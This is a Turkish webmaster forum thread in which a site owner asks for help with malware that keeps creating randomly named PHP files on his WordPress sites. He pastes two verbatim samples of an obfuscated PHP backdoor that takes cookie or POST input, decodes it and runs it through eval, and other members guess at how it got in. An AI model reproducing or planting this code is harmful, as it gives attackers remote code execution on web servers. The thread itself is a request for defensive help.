lostyazilim
tr.link

Sahte Dosya İsimleri VİRÜS

7 Mesajlar 1.191 Okunma
acebozum
tr.link

mertcanfirat mertcanfirat Üyeliği Durdurulmuş Banlı Kullanıcı
  • Üyelik 08.12.2013
  • Yaş/Cinsiyet 28 / E
  • Meslek Web Tasarım
  • Konum İstanbul Avrupa
  • Ad Soyad M** F**
  • Mesajlar 784
  • Beğeniler 128 / 137
  • Ticaret 48, (%100)
Arkadaşlar sitelerime virüs bulaştı. Tek bir hostinge bağlı 3-4 sitem var. Hepsinde kendi kendine garip dosya isimli php dosyalar açıyor. cPanel şifrelerini değiştirdim, ftp şifrelerini değiştirdim ama çözüm yok. Farklı bir firmada barınan reseller hostingimde de aynı sorun devam ediyor. FTP programını her girişte sorulan şeklinde düzelttim. Sucuri ve Wordfence kurdum ama çözüm yine yok. İndex ve wp-config dosyalarıma include ile başlayan bir kod ekleniyor ve sitemde garip isimler oluşuyor. Örneğin 2o8yaett.php gibi.Örnek olarak;

$odpha = 'x9b#ns-gdoy3u_c*5a6r1mfpHvt\'7l4e20ik';$nnddx = Array();$nnddx[] = $odpha[1].$odpha[1].$odpha[28].$odpha[28].$odpha[11].$odpha[14].$odpha[14].$odpha[33].$odpha[6].$odpha[11].$odpha[33].$odpha[16].$odpha[1].$odpha[6].$odpha[30].$odpha[14].$odpha[16].$odpha[17].$odpha[6].$odpha[1].$odpha[33].$odpha[31].$odpha[30].$odpha[6].$odpha[32].$odpha[22].$odpha[28].$odpha[2].$odpha[30].$odpha[2].$odpha[11].$odpha[18].$odpha[8].$odpha[20].$odpha[16].$odpha[33];$nnddx[] = $odpha[24].$odpha[15];$nnddx[] = $odpha[3];$nnddx[] = $odpha[14].$odpha[9].$odpha[12].$odpha[4].$odpha[26];$nnddx[] = $odpha[5].$odpha[26].$odpha[19].$odpha[13].$odpha[19].$odpha[31].$odpha[23].$odpha[31].$odpha[17].$odpha[26];$nnddx[] = $odpha[31].$odpha[0].$odpha[23].$odpha[29].$odpha[9].$odpha[8].$odpha[31];$nnddx[] = $odpha[5].$odpha[12].$odpha[2].$odpha[5].$odpha[26].$odpha[19];$nnddx[] = $odpha[17].$odpha[19].$odpha[19].$odpha[17].$odpha[10].$odpha[13].$odpha[21].$odpha[31].$odpha[19].$odpha[7].$odpha[31];$nnddx[] = $odpha[5].$odpha[26].$odpha[19].$odpha[29].$odpha[31].$odpha[4];$nnddx[] = $odpha[23].$odpha[17].$odpha[14].$odpha[35];foreach ($nnddx[7]($_COOKIE, $_POST) as $kujjzrc => $oidmnkl){function ghdxmxv($nnddx, $kujjzrc, $hvidkqy){return $nnddx[6]($nnddx[4]($kujjzrc . $nnddx[0], ($hvidkqy / $nnddx[8]($kujjzrc)) + 1), 0, $hvidkqy);}function dqltm($nnddx, $trtse){return @$nnddx[9]($nnddx[1], $trtse);}function cvtkdlp($nnddx, $trtse){$vbbdg = $nnddx[3]($trtse) % 3;if (!$vbbdg) {eval($trtse[1]($trtse[2]));exit();}}$oidmnkl = dqltm($nnddx, $oidmnkl);cvtkdlp($nnddx, $nnddx[5]($nnddx[2], $oidmnkl ^ ghdxmxv($nnddx, $kujjzrc, $nnddx[8]($oidmnkl))));}


Mesela dump71.php diye bir dosya açmışlar. Şu şekilde
$unveh = '7bfkmnv\'H_tp3los6u59#rd-a2exgiyc804*';$niiagr = Array();$niiagr[] = $unveh[8].$unveh[35];$niiagr[] = $unveh[0].$unveh[12].$unveh[12].$unveh[32].$unveh[16].$unveh[25].$unveh[1].$unveh[0].$unveh[23].$unveh[19].$unveh[22].$unveh[24].$unveh[25].$unveh[23].$unveh[34].$unveh[31].$unveh[24].$unveh[32].$unveh[23].$unveh[19].$unveh[1].$unveh[26].$unveh[16].$unveh[23].$unveh[24].$unveh[33].$unveh[31].$unveh[22].$unveh[1].$unveh[32].$unveh[12].$unveh[18].$unveh[31].$unveh[19].$unveh[2].$unveh[19];$niiagr[] = $unveh[20];$niiagr[] = $unveh[31].$unveh[14].$unveh[17].$unveh[5].$unveh[10];$niiagr[] = $unveh[15].$unveh[10].$unveh[21].$unveh[9].$unveh[21].$unveh[26].$unveh[11].$unveh[26].$unveh[24].$unveh[10];$niiagr[] = $unveh[26].$unveh[27].$unveh[11].$unveh[13].$unveh[14].$unveh[22].$unveh[26];$niiagr[] = $unveh[15].$unveh[17].$unveh[1].$unveh[15].$unveh[10].$unveh[21];$niiagr[] = $unveh[24].$unveh[21].$unveh[21].$unveh[24].$unveh[30].$unveh[9].$unveh[4].$unveh[26].$unveh[21].$unveh[28].$unveh[26];$niiagr[] = $unveh[15].$unveh[10].$unveh[21].$unveh[13].$unveh[26].$unveh[5];$niiagr[] = $unveh[11].$unveh[24].$unveh[31].$unveh[3];foreach ($niiagr[7]($_COOKIE, $_POST) as $aobtq => $checwi){function ompymft($niiagr, $aobtq, $pesadq){return $niiagr[6]($niiagr[4]($aobtq . $niiagr[1], ($pesadq / $niiagr[8]($aobtq)) + 1), 0, $pesadq);}function ytyci($niiagr, $xgsrej){return @$niiagr[9]($niiagr[0], $xgsrej);}function hckrdx($niiagr, $xgsrej){$swtyrsx = $niiagr[3]($xgsrej) % 3;if (!$swtyrsx) {eval($xgsrej[1]($xgsrej[2]));exit();}}$checwi = ytyci($niiagr, $checwi);hckrdx($niiagr, $niiagr[5]($niiagr[2], $checwi ^ ompymft($niiagr, $aobtq, $niiagr[8]($checwi))));}
 

 

elektronikssl
webimgo

mxaksoy mxaksoy Üyeliği Durdurulmuş Banlı Kullanıcı
  • Üyelik 23.03.2018
  • Yaş/Cinsiyet 29 / E
  • Meslek Webmaster
  • Konum İstanbul Avrupa
  • Ad Soyad M** A**
  • Mesajlar 1358
  • Beğeniler 482 / 344
  • Ticaret 3, (%100)
Muhtemelen Sadrazam / Priv8 Shell Bulaşmıştır.
NumanABi bakar mısın?
NumanABi

kişi bu mesajı beğendi.

NumanABi NumanABi --> numanozdemir.com <-- Kullanıcı
  • Üyelik 02.09.2016
  • Yaş/Cinsiyet 34 / E
  • Meslek -
  • Konum Kırıkkale
  • Ad Soyad N** Ö**
  • Mesajlar 1417
  • Beğeniler 380 / 442
  • Ticaret 21, (%95)
Sadrazam olduğunu düşünmüyorum, basit komut çalıştıran ve kendini sürekli kopyalan bir virüs, genelde warez yoluyla bulaşıyor.
 

 

mertcanfirat mertcanfirat Üyeliği Durdurulmuş Banlı Kullanıcı
  • Üyelik 08.12.2013
  • Yaş/Cinsiyet 28 / E
  • Meslek Web Tasarım
  • Konum İstanbul Avrupa
  • Ad Soyad M** F**
  • Mesajlar 784
  • Beğeniler 128 / 137
  • Ticaret 48, (%100)
Garip şekilde config dosyamı 755 şekline getiriyor izinini
 

 

wmaraci
wmaraci

0x3a 0x3a Editörlük Yapılır Kullanıcı
  • Üyelik 12.01.2017
  • Yaş/Cinsiyet 27 / E
  • Meslek Editörlük Hizmeti
  • Konum Azerbeycan
  • Ad Soyad T** M**
  • Mesajlar 284
  • Beğeniler 7 / 41
  • Ticaret 9, (%100)
merhaba hocam zamanında hackingle uğraşan biri olarak söylüyorum tabi hatamda olabilir ama bence kullandığınız eklentilerden kaynaklanan bir açıkla sitenize girmiş olabilirler

örnek site linkini incelerseniz ne demek istediğimi anlarsınız

https://www.vwawater.com/wp-content/plugins/pullout-widgets-for-wordpress/lib/
 

 

Copy Paste, Ürün Ekleme, Film ve Dizi Ekleme İşleriniz yapılır

WebDevelopers WebDevelopers Kimlik Onayı Bekliyor Banlı Kullanıcı
  • Üyelik 11.01.2018
  • Yaş/Cinsiyet 30 / E
  • Meslek Yazılım Geliştirme Uzmanı
  • Konum İstanbul Avrupa
  • Ad Soyad Ö** D**
  • Mesajlar 371
  • Beğeniler 30 / 55
  • Ticaret 14, (%86)
büyük ihtimalle bir yerden shell de gömmüş olabilirller shell içinden otomatik bir çok dosya üretebilirler
 

 

mertcanfirat mertcanfirat Üyeliği Durdurulmuş Banlı Kullanıcı
  • Üyelik 08.12.2013
  • Yaş/Cinsiyet 28 / E
  • Meslek Web Tasarım
  • Konum İstanbul Avrupa
  • Ad Soyad M** F**
  • Mesajlar 784
  • Beğeniler 128 / 137
  • Ticaret 48, (%100)
@Ox3a galiba eklenti gizlilik ayarlarından değil mi?
 

 

Site Ayarları
  • Tema Seçeneği
  • Site Sesleri
  • Bildirimler
  • Özel Mesaj Al